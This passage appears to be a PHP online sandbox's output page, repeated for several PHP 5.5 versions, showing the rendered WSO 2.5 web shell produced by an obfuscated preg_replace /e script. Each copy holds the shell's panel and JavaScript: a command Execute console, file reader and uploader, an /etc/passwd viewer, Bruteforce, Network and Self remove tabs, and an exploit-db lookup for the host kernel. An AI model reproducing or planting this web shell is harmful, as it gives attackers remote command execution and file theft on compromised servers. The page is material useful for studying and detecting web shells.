class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.34
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.34 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.33
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.33 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.32
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.32 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.31
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.31 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.30
